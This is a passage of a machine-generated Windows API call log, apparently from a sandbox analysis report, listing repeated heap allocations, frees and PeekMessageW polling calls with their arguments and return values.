(in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0128.878] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0128.878] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0128.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0128.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0128.879] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0128.879] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0128.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0128.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0128.879] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0128.880] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0128.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.880] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0128.880] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65d8 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0128.880] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.880] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.881] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0128.881] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0128.881] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0128.882] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0128.882] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0128.882] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0128.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0128.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0128.883] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0128.927] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffb90 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65f0 [0128.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffcd0 [0128.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0128.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6608 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65f0 | out: hHeap=0x12c0000) returned 1 [0128.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6758 | out: hHeap=0x12c0000) returned 1 [0128.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffb90 | out: hHeap=0x12c0000) returned 1 [0128.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffcd0 | out: hHeap=0x12c0000) returned 1 [0128.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0128.929] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.929] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.929] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.929] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0128.930] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0128.930] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.930] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0128.930] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.930] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0128.930] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0128.931] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0128.931] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.931] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0128.932] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0128.932] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0128.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0128.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0128.932] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0128.933] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0128.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0128.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0128.934] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffb90 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0128.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffbe0 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6680 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65f0 [0128.934] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0128.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0128.934] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffcd0 [0128.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6500 [0128.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa20 [0128.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6500 | out: hHeap=0x12c0000) returned 1 [0128.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302290 [0128.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b64e8 [0128.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6608 [0128.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0128.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6698 [0128.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.936] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300090 [0128.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0128.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0128.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300090 | out: hHeap=0x12c0000) returned 1 [0128.936] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0128.936] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0128.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0128.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0128.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0128.937] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0128.937] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0128.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0128.938] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0128.938] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0128.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0128.938] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0128.939] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.939] RtlAllocateHeap 